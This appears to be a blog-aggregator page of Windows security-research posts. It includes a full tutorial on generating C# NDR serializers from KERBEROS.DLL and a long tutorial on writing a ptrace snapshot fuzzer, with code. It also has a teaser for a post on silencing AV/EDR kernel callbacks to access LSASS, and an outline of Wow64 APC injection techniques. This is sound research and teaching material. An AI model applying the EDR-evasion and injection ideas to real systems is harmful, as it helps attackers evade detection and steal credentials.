Windows Exploitation

Winsider Seminars & Solutions Inc.
Critical, Protected, DUT Processes in Windows 10
By: Yarden Shafir
3 August 2020 at 13:42

[…]

Matteo Malvica
Silencing the EDR. How to disable process, threads and image-loading detection callbacks.
15 July 2020 at 00:00

Background - TL;DR This post picks up Rui’s very inspiring piece on Windows kernel callbacks and takes it a little further by adding new functionality to build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender use kernel callbacks to either prevent us from accessing modules loaded in LSASS or detect malicious activity. We’ll then use our evil driver to temporarily silence any callbacks the AV has registered and restore the EDR’s original code once we are done with our task.

Winsider Seminars & Solutions Inc.
Secure Pool Internals : Dynamic KDP Behind The Hood
By: Yarden Shafir
13 July 2020 at 08:28

[…]

Tyranid's Lair
Generating NDR Type Serializers for C#
By: tiraniddo
1 July 2020 at 21:32

As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) use Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser, but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create a standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
    typedef struct _TEST_TYPE
    {
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;
}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
{
    typedef [encode, decode] TEST_TYPE;
}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers.

If you look at the Decode function when compiled for an x64 target it should look like the following:

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode3(
        _MidlEsHandle,
        ( PMIDL_TYPE_PICKLING_INFO )&__MIDL_TypePicklingInfo,
        &TypeEncoders_ProxyInfo,
        TypePicklingOffsetTable,
        0,
        _pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:

1. The serialization handle. It maintains state such as the current stream position and can be used multiple times to encode or decode more than one structure in a stream.
2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
4. A list of type offset arrays. These contain the byte offsets into the format string (from the Proxy Info structure) for all type serializers.
5. The index of the type offset in the 4th parameter.
6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov [rsp+28h], r14 ; pObject
mov dword ptr [rsp+20h], 5 ; nTypeIndex
lea r9, off_1800F3138 ; ArrTypeOffset
lea r8, stru_1800D5EA0 ; pProxyInfo
lea rdx, stru_1800DEAF0 ; pPicklingInfo
mov rcx, [rsp+68h] ; Handle
call NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
-OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType so that the structures are wrapped inside Unique Pointers. This is the default when using the real RPC runtime, although it isn't strictly necessary except for Conformant Structures. If you don't do this then the decode will typically fail, and it certainly will in this case.

You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. The official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures, so we can build our own executable containing the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface, not only can you avoid having to work out the offsets, as Get-RpcServer will automatically find the location, you can also use an additional feature to extract the type information from your private symbols to fix up the type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
version(1.0),
]
interface RpcServer
{
int Test([in] handle_t hBinding,
[unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

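#include <stdio.h>

#pragma comment(lib, "rpcrt4.lib")

// Allocator callbacks required by the MIDL-generated stubs.
extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    // delete[] on a void* is undefined, so cast back to the allocated type.
    delete[] static_cast<char*>(p);
}

// The body must be unique so the linker does not fold it with another function.
int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;
}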

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost. Here we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle calls to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode2(
        _MidlEsHandle,
        ( PMIDL_TYPE_PICKLING_INFO )&__MIDL_TypePicklingInfo,
        &TypeEncoders_StubDesc,
        ( PFORMAT_STRING )&types__MIDL_TypeFormatString.Format[2],
        _pType);
}

1. The serialization handle.
2. The MIDL_TYPE_PICKLING_INFO structure.
3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
4. A pointer into the format string for the start of the type.
5. A pointer to the structure to serialize or deserialize.

Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
-StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's an offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
-StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

Low Level Pleasure
APC Series: KiUserApcDispatcher and Wow64
28 June 2020 at 00:00

I recommend reading the previous posts before reading this one:

User APC API: We discussed the user mode API of user APC
User APC Internals: We discussed the implementation of user APC in the kernel

Let’s continue our discussion about APC internals in Windows. This time we’ll discuss APC dispatching in user mode and how APC works in Wow64 processes:

The evolution of KiUserApcDispatcher
Modifications to APC functions to support Wow64
Wow64 APC injection techniques

The evolution of KiUserApcDispatcher

NTDLL contains a set of entry points that the kernel uses to run code in user mode, like KiUserExceptionDispatcher, KiUserCallbackDispatcher, …

The Human Machine Interface
Fuzzing Like A Caveman 4: Snapshot/Code Coverage Fuzzer!
By: h0mbre
13 June 2020 at 04:00

Introduction

Last time we blogged, we had a dumb fuzzer testing an intentionally vulnerable program. That program performed a series of checks on an input file: if the file passed a check, it progressed to the next check, and if the input passed all checks the program would segfault. We discovered the importance of code coverage and how it can help turn exponentially rare occurrences during fuzzing into linearly rare occurrences. Let’s get right into how we improved our dumb fuzzer!

Big thanks to @gamozolabs for all of his content that got me hooked on the topic.

Performance

First things first, our dumb fuzzer was slow as hell. If you remember, we were averaging about 1,500 fuzz cases per second with our dumb fuzzer. During my testing, AFL in QEMU mode (simulating not having source code available for compilation instrumentation) was hovering around 1,000 fuzz cases per second. This makes sense, since AFL does way more than our dumb fuzzer, especially in QEMU mode where we are emulating a CPU and providing code coverage.

Our target binary (-> HERE <-) would do the following:

extract the bytes from a file on disk into a buffer
perform 3 checks on the buffer to see if the bytes at the checked indexes match hardcoded values
segfault if all checks pass, exit if one of the checks fails

Our dumb fuzzer would do the following:

extract bytes from a valid jpeg on disk into a byte buffer
mutate 2% of the bytes in the buffer by random byte overwriting
write the mutated file to disk
feed the mutated file to the target binary by executing a fork() and execvp() each fuzzing iteration
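
The mutation step in that list can be sketched in a few lines of C. This is only an illustration under my own assumptions: the function name mutate_buffer, the use of rand()/srand(), and the "at least one byte" floor are made up here and are not taken from the original dumb fuzzer.

```c
#include <stddef.h>
#include <stdlib.h>

// Overwrite roughly 2% of the bytes in buf with random values.
// Returns the number of overwrite operations performed.
// (Hypothetical helper, not the original fuzzer's code.)
size_t mutate_buffer(unsigned char *buf, size_t len, unsigned int seed) {
    if (buf == NULL || len == 0) {
        return 0;
    }

    srand(seed);

    size_t overwrites = len / 50;   // 2% of the buffer
    if (overwrites == 0) {
        overwrites = 1;             // always touch at least one byte
    }

    for (size_t i = 0; i < overwrites; i++) {
        size_t index = (size_t)rand() % len;        // pick a random position
        buf[index] = (unsigned char)(rand() % 256); // overwrite with a random byte
    }

    return overwrites;
}
```

Because positions are picked independently, the same index can be hit twice, so the number of bytes that actually differ from the original can be a little lower than 2%.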

As you can see, this is a lot of file system interactions and syscalls. Let’s use strace on our vulnerable binary and see what syscalls the binary makes (for this post, I’ve hardcoded the .jpeg file into the vulnerable binary so that we don’t have to use command line arguments for ease of testing):

execve("/usr/bin/vuln", ["vuln"], 0x7ffe284810a0 /* 52 vars */) = 0
brk(NULL)                               = 0x55664f046000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=88784, ...}) = 0
mmap(NULL, 88784, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f0793d2e000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0793d2c000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f079372c000
mprotect(0x7f0793913000, 2097152, PROT_NONE) = 0
mmap(0x7f0793b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f0793b13000
mmap(0x7f0793b19000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f0793b19000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7f0793d2d500) = 0
mprotect(0x7f0793b13000, 16384, PROT_READ) = 0
mprotect(0x55664dd97000, 4096, PROT_READ) = 0
mprotect(0x7f0793d44000, 4096, PROT_READ) = 0
munmap(0x7f0793d2e000, 88784)           = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL)                               = 0x55664f046000
brk(0x55664f067000)                     = 0x55664f067000
write(1, "[>] Analyzing file: Canon_40D.jp"..., 35[>] Analyzing file: Canon_40D.jpg.
) = 35
openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
lseek(3, 4096, SEEK_SET)                = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 3862) = 3862
lseek(3, 0, SEEK_SET)                   = 0
write(1, "[>] Canon_40D.jpg is 7958 bytes."..., 33[>] Canon_40D.jpg is 7958 bytes.
) = 33
read(3, "\377\330\377\340\0\20JFIF\0\1\1\1\0H\0H\0\0\377\341\t\254Exif\0\0II"..., 4096) = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 4096) = 3862
close(3)                                = 0
write(1, "[>] Check 1 no.: 2626\n", 22[>] Check 1 no.: 2626
) = 22
write(1, "[>] Check 2 no.: 3979\n", 22[>] Check 2 no.: 3979
) = 22
write(1, "[>] Check 3 no.: 5331\n", 22[>] Check 3 no.: 5331
) = 22
write(1, "[>] Check 1 failed.\n", 20[>] Check 1 failed.
)   = 20
write(1, "[>] Char was 00.\n", 17[>] Char was 00.
)      = 17
exit_group(-1)                          = ?
+++ exited with 255 +++

You can see that the target binary runs plenty of code before it even opens the input file. Looking through the strace output, the input file isn’t opened until after the following syscalls have run:

execve
brk
access
access
openat
fstat
mmap
close
access
openat
read
fstat
mmap
mmap
mprotect
mmap
mmap
close
arch_prctl
mprotect
mprotect
mprotect
munmap
fstat
brk
brk
write

After all of those syscalls, we finally open the file from the disk to read in the bytes with this line from the strace output:

openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3

So keep in mind, we run these syscalls every single fuzz iteration with our dumb fuzzer. Our dumb fuzzer (-> HERE <-) would write a file to disk every iteration and spawn an instance of the target program with fork() + execvp(). The vulnerable binary would run all of the startup syscalls and finally read in the file from disk every iteration. So that’s a couple dozen syscalls and two file system interactions every single fuzzing iteration. No wonder our dumb fuzzer was so slow.

Rudimentary Snapshot Mechanism

I started to think about how we could save time when fuzzing such a simple target binary. If I could figure out how to take a snapshot of the program’s memory after it had already read the file off of disk and stored the contents in its heap, I could save that process state, manually insert a new fuzzcase in place of the bytes the target had read in, and then let the program run until it reaches an exit() call. Once the target hits the exit call, I would rewind the program state to what it was when I captured the snapshot, insert a new fuzz case, and do it all over again.

You can see how this would improve performance. We would skip all of the target binary’s startup overhead and completely bypass all file system interactions. Another huge difference is that we would only make one call to fork(), which is an expensive syscall. For 100,000 fuzzing iterations, say, we’d go from 200,000 file system interactions (one for the dumb fuzzer to create a mutated.jpeg on disk, one for the target to read the mutated.jpeg) and 100,000 fork() calls to 0 file system interactions and only the initial fork().

In summary, our fuzzing process should look like this:

1. Start target binary, but break on first instruction before anything runs
2. Set breakpoints on a ‘start’ and ‘end’ location (start will be after the program reads in bytes from the file on disk, end will be the address of exit())
3. Run the program until it hits the ‘start’ breakpoint
4. Collect all writable memory sections of the process in a buffer
5. Capture all register states
6. Insert our fuzzcase into the heap overwriting the bytes that the program read in from file on disk
7. Resume target binary until it reaches ‘end’ breakpoint
8. Rewind process state to where it was at ‘start’
9. Repeat from step 6

We only do steps 1-5 once, so that part of the routine doesn’t need to be very fast. Steps 6-9 are where the fuzzer will spend 99% of its time, so they need to be fast.
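
To make the shape of that hot loop concrete before any ptrace is involved, here is a toy, in-process analogy of steps 6-9. Everything in it is an assumption for illustration: struct state stands in for the target’s writable memory and registers, run_target stands in for "resume until the ‘end’ breakpoint", and the crash condition is invented. It is not how the real fuzzer talks to the target.

```c
#include <stddef.h>
#include <string.h>

#define STATE_SIZE 64

// Stand-in for the target's writable memory plus its "registers".
struct state {
    unsigned char memory[STATE_SIZE];
    size_t pc;
};

// Stand-in for running the target to the 'end' breakpoint: it clobbers
// state and reports 1 when the (made-up) crash condition is met.
static int run_target(struct state *s) {
    s->pc += 10;
    s->memory[1] ^= 0xFF;
    return s->memory[0] == 0x42;
}

// Steps 6-9: insert fuzzcase, run, rewind, repeat.
// Returns the number of iterations that "crashed".
size_t fuzz_loop(struct state *live, const unsigned char *cases, size_t n_cases) {
    struct state snapshot;
    memcpy(&snapshot, live, sizeof snapshot);       // steps 4-5, done once

    size_t crashes = 0;
    for (size_t i = 0; i < n_cases; i++) {
        live->memory[0] = cases[i];                 // step 6: insert fuzzcase
        crashes += (size_t)run_target(live);        // step 7: run to 'end'
        memcpy(live, &snapshot, sizeof snapshot);   // step 8: rewind
    }                                               // step 9: repeat
    return crashes;
}
```

The point of the sketch is that each iteration costs two memory copies and one run of the target, with no process creation and no file system access inside the loop.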

Writing a Simple Debugger with Ptrace

In order to implement our snapshot mechanism, we’ll need to use the very intuitive, albeit apparently slow and restrictive, ptrace() interface. When I was getting started writing the debugger portion of the fuzzer a couple weeks ago, I leaned heavily on this blog post by Eli Bendersky which is a great introduction to ptrace() and shows you how to create a simple debugger.

Breakpoints

The debugger portion of our code doesn’t really need much functionality, it really only needs to be able to insert breakpoints and remove breakpoints. The way that you use ptrace() to set and remove breakpoints is to overwrite the byte at an address with the single-byte int3 instruction, opcode \xCC. However, if you just overwrite the value there while setting a breakpoint, it will be impossible to remove the breakpoint because you won’t know what value was held there originally and so you won’t know what to overwrite \xCC with.

To begin using ptrace(), we spawn a second process with fork().

pid_t child_pid = fork();
if (child_pid == 0) {
    //we're the child process here
    execute_debugee(debugee);
}

Now we need to have the child process volunteer to be ‘traced’ by the parent process. This is done with the PTRACE_TRACEME argument, which we’ll use inside our execute_debugee function:

// request via PTRACE_TRACEME that the parent trace the child
long ptrace_result = ptrace(PTRACE_TRACEME, 0, 0, 0);
if (ptrace_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("ptrace");
    exit(errno);
}

The rest of the function doesn’t involve ptrace, but I’ll go ahead and show it here because it contains an important call that forcibly disables ASLR in the debuggee process. This is crucial as we’ll be leveraging breakpoints at static addresses that cannot change from process to process. We disable ASLR by calling personality() with ADDR_NO_RANDOMIZE. Separately, we’ll route stdout and stderr to /dev/null so that we don’t muddy our terminal with the target binary’s output.

// disable ASLR
int personality_result = personality(ADDR_NO_RANDOMIZE);
if (personality_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("personality");
    exit(errno);
}
 
// dup both stdout and stderr and send them to /dev/null
int fd = open("/dev/null", O_WRONLY);
dup2(fd, 1);
dup2(fd, 2);
close(fd);
 
// exec our debugee program, NULL terminated to avoid Sentinel compilation
// warning. this replaces the fork() clone of the parent with the 
// debugee process 
int execl_result = execl(debugee, debugee, NULL);
if (execl_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("execl");
    exit(errno);
}

First things first, we need a way to grab the one-byte value at an address before we insert our breakpoint. For the fuzzer, I developed a header file and source file I called ptrace_helpers to help ease the development process of using ptrace(). To grab the value, we’ll grab the 64-bit value at the address but only care about the least significant byte (the one all the way to the right when the value is printed). (I’m using the type long long unsigned because that’s how register values are defined in <sys/user.h> and I wanted to keep everything the same).

long long unsigned get_value(pid_t child_pid, long long unsigned address) {
    
    errno = 0;
    long long unsigned value = ptrace(PTRACE_PEEKTEXT, child_pid, (void*)address, 0);
    if (value == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }

    return value;	
}

So this function will use the PTRACE_PEEKTEXT argument to read the value located at address in the child process (child_pid) which is our target. So now that we have this value, we can save it off and insert our breakpoint with the following code:

void set_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    long long unsigned breakpoint = (original_value & 0xFFFFFFFFFFFFFF00) | 0xCC;
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)breakpoint);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

You can see that this function takes the original value that we gathered with the previous function and performs two bitwise operations to keep the upper 7 bytes intact while replacing the lowest byte with \xCC. On little-endian x86-64, that lowest byte is the one stored at bp_address itself. Notice that we are now using PTRACE_POKETEXT. One of the frustrating features of the ptrace() interface is that we can only read and write 8 bytes at a time!
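
Here is a small worked example of that masking, kept free of ptrace so it can be run anywhere. The helper names are made up for illustration, and the sample word is just the first 8 bytes of the jpeg as they appear later in this post, used purely as data. The byte_at_address check assumes a little-endian machine.

```c
#include <stdint.h>
#include <string.h>

// Replace the least significant byte of a peeked word with int3 (0xCC),
// leaving the upper 7 bytes untouched. (Hypothetical helper.)
uint64_t make_breakpoint_word(uint64_t original_word) {
    return (original_word & ~(uint64_t)0xFF) | 0xCC;
}

// Return the byte stored at the lowest memory address of the word, which
// is the byte sitting at the peeked address itself.
unsigned char byte_at_address(uint64_t word) {
    unsigned char bytes[sizeof word];
    memcpy(bytes, &word, sizeof word);
    return bytes[0];
}
```

With the sample word 0x464a1000e0ffd8ff, the patched word is 0x464a1000e0ffd8cc, and on little-endian hardware the byte at the address changes from 0xFF to 0xCC. Writing the saved original word back undoes the patch.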

So now that we can set breakpoints, the last function we need to implement is one to remove breakpoints, which would entail overwriting the int3 with the original byte value.

void revert_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)original_value);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

Again, using PTRACE_POKETEXT, we can overwrite the \xCC with the original byte value. So now we have the ability to set and remove breakpoints.

Lastly, we’ll need a way to resume execution in the debuggee. This can be accomplished by utilizing the PTRACE_CONT argument in ptrace() as follows:

void resume_execution(pid_t child_pid) {

    int ptrace_result = ptrace(PTRACE_CONT, child_pid, 0, 0);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

An important thing to note is that if we hit a breakpoint at address 0x0000000000000000, rip will actually be at 0x0000000000000001. So after reverting our overwritten instruction to its previous value, we’ll also need to subtract 1 from rip before resuming execution. We’ll learn how to do this via ptrace in the next section.
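
As a quick preview of that rip fix-up, here is a minimal sketch, assuming x86-64 Linux and a tracee that is already stopped at the breakpoint. The names rewind_rip and step_back_over_breakpoint are made up for illustration and are not part of ptrace_helpers.

```c
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>

// Pure helper: after an int3 fires, rip points one byte past the
// breakpoint address, so back it up by one.
void rewind_rip(struct user_regs_struct *regs) {
    regs->rip -= 1;
}

// Fetch registers from a stopped tracee, back rip up by one, and write
// them back. Returns 0 on success, -1 if either ptrace() request fails.
int step_back_over_breakpoint(pid_t child_pid) {
    struct user_regs_struct regs;

    if (ptrace(PTRACE_GETREGS, child_pid, 0, &regs) == -1) {
        perror("ptrace(PTRACE_GETREGS)");
        return -1;
    }

    rewind_rip(&regs);

    if (ptrace(PTRACE_SETREGS, child_pid, 0, &regs) == -1) {
        perror("ptrace(PTRACE_SETREGS)");
        return -1;
    }

    return 0;
}
```

The original instruction bytes still have to be restored at the breakpoint address before resuming, otherwise the tracee would just hit the same int3 again.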

Let’s now learn how we can utilize ptrace and the /proc pseudo files to create a snapshot of our target!

Snapshotting with ptrace and /proc

Register States

Another cool feature of ptrace() is the ability to capture and set register states in a debuggee process. We can do both of those things respectively with the helper functions I placed in ptrace_helpers.c:

// retrieve register states
struct user_regs_struct get_regs(pid_t child_pid, struct user_regs_struct registers) {
    int ptrace_result = ptrace(PTRACE_GETREGS, child_pid, 0, &registers);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }

    return registers;
}

// set register states
void set_regs(pid_t child_pid, struct user_regs_struct registers) {

    int ptrace_result = ptrace(PTRACE_SETREGS, child_pid, 0, &registers);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

The struct user_regs_struct is defined in <sys/user.h>. You can see we use PTRACE_GETREGS and PTRACE_SETREGS respectively to retrieve register data and set register data. So with these two functions, we’ll be able to create a struct user_regs_struct of snapshot register values when we are sitting at our ‘start’ breakpoint, and when we reach our ‘end’ breakpoint we’ll be able to revert the register states (most importantly rip) to what they were when snapshotted.

Snapshotting Writable Memory Sections with /proc

Now that we have a way to capture register states, we’ll need a way to capture writable memory states for our snapshot. I did this by interacting with the /proc pseudo files. I used GDB to break on the first function that performs a check in vuln. Importantly, this function runs after vuln reads the jpeg off disk, and it will serve as our ‘start’ breakpoint. Once we break here in GDB, we can cat the /proc/$pid/maps file to get a look at how memory is mapped in the process (keep in mind GDB also forces ASLR off using the same method we did in our debugger). We can see the output here grepping for writable sections (i.e., sections that could be clobbered during our fuzzcase run):

h0mbre@pwn:~/fuzzing/dragonfly_dir$ cat /proc/12011/maps | grep rw
555555756000-555555757000 rw-p 00002000 08:01 786686                     /home/h0mbre/fuzzing/dragonfly_dir/vuln
555555757000-555555778000 rw-p 00000000 00:00 0                          [heap]
7ffff7dcf000-7ffff7dd1000 rw-p 001eb000 08:01 1055012                    /lib/x86_64-linux-gnu/libc-2.27.so
7ffff7dd1000-7ffff7dd5000 rw-p 00000000 00:00 0 
7ffff7fe0000-7ffff7fe2000 rw-p 00000000 00:00 0 
7ffff7ffd000-7ffff7ffe000 rw-p 00028000 08:01 1054984                    /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]

The grep output shows eight writable mappings, and the heap is one of them (the snapshot code further down hardcodes the other seven). It is important to realize that our fuzzcase will be inserted into the heap, but the heap address that stores the fuzzcase will not be the same in our fuzzer as it is in GDB. I think this is likely due to some sort of environment variable difference between the two debuggers. If we look in GDB when we break on check_one() in vuln, we see that rax is a pointer to the beginning of our input, in this case the Canon_40D.jpg.

$rax   : 0x00005555557588b0  →  0x464a1000e0ffd8ff

That pointer, 0x00005555557588b0, is located in the heap. So all I had to do to find out where that pointer was in our debugger/fuzzer, was just break at the same point and use ptrace() to retrieve the rax value.
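
Going back to the writable mappings listed above for a moment: the bookkeeping around them can be sketched without touching a live process. The two helpers below are hypothetical (their names and signatures are mine). One parses a single /proc/$pid/maps line, and the other packs region lengths back to back so that each buffer offset is the running sum of the lengths before it.

```c
#include <stddef.h>
#include <stdio.h>

// Parse one /proc/<pid>/maps line. Returns 1 if it describes a writable
// mapping (filling in start and end), 0 otherwise.
int parse_writable_mapping(const char *line,
                           unsigned long long *start,
                           unsigned long long *end) {
    char perms[5] = { 0 };

    // Format: "start-end perms offset dev inode path"
    if (sscanf(line, "%llx-%llx %4s", start, end, perms) != 3) {
        return 0;
    }

    return perms[1] == 'w';
}

// Fill offsets[i] with the sum of lengths[0..i-1] so that regions sit
// back to back in one buffer. Returns the total buffer size needed.
size_t pack_offsets(const size_t *lengths, size_t *offsets, size_t count) {
    size_t total = 0;

    for (size_t i = 0; i < count; i++) {
        offsets[i] = total;
        total += lengths[i];
    }

    return total;
}
```

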